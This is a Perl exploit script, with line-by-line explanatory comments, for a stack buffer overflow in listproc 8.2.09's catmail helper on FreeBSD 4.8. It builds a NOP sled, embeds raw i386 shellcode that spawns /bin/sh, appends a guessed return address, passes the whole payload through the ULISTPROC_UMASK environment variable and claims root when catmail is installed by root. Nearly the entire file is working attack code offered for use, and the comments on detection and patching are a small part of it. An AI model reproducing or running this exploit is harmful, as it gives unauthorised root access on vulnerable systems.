- #!/usr/bin/perl -w
- # DSR-listproc.pl - kokaninATdtors.net vs. listproc 8.2.09 (bug found by KF)
- # as per http://www.packetstormsecurity.nl/0305-advisories/srt2003-1137.txt
- # offset, retaddr and shellcode are for my FreeBSD 4.8-RELEASE, YMMV
- # shellcode by eSDee, hello there eSDee
- # don't forget to edit the path to the catmail binary
- # this yields uid(0) if listproc is installed by root, otherwise something else
-
- # Payload layout.  Everything below builds one oversized string and hands it
- # to the listproc helper `catmail` through the ULISTPROC_UMASK environment
- # variable (the advisory cited on line 4 describes that variable as the
- # overflow vector).  There is no `use strict`: $len, $ret, $nop, $shellcode,
- # $buffer and $i are all package globals.
- $len = 16534;   # nominal size of the string; the loop below adds 8 on top
- $ret = pack("l",0xbfbfd176); # appx. middle of the env_var (as seen w. ½ eye)
-                              # "l" = native signed long: 4 bytes, little-endian
-                              # on the i386 FreeBSD box the header describes
- $nop = "\x90";  # single-byte x86 NOP, repeated below to form the sled
- # Raw i386 machine code (line 6 credits eSDee), 37 bytes in total.  The byte
- # sequences "//sh" (\x2f\x2f\x73\x68) and "/bin" (\x2f\x62\x69\x6e) are visible
- # in the middle fragment, consistent with the header's claim (line 8) that a
- # successful run ends in a shell running as whatever user catmail runs as.
- $shellcode = "\x31\xc0\x50\x50\xb0\x17\xcd\x80\x31\xc0\x50\x68".
- "\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50".
- "\x54\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";
-
- # NOP sled: $len - (37 - 8) = 16505 bytes.  After the 37-byte shellcode and
- # the two 4-byte copies of $ret the finished string is $len + 16 = 16550 bytes.
- for ($i = 0; $i < $len - (length($shellcode)-8); $i++) {
- $buffer .= $nop;   # $buffer starts out undef; .= on undef is silent under -w
- }
- $buffer .= $shellcode;
- $buffer .= $ret x 2;   # two adjacent copies of the guessed stack address
- # `local` on an %ENV slot exports the value to this process and every child it
- # spawns; the old value would be restored when the file scope exits, which is
- # effectively program end here.
- local($ENV{'ULISTPROC_UMASK'}) = $buffer;
- # One-argument system() with no shell metacharacters execs "catmail" directly,
- # resolved through PATH (line 7 says to edit the path).  From the defender's
- # side the observable signature is a catmail process started with a ~16 KB
- # ULISTPROC_UMASK in its environment; the remedy is the vendor fix referenced
- # in the line-4 advisory, and line 8 shows why catmail should not be running
- # with root privileges in the first place.
- system("catmail");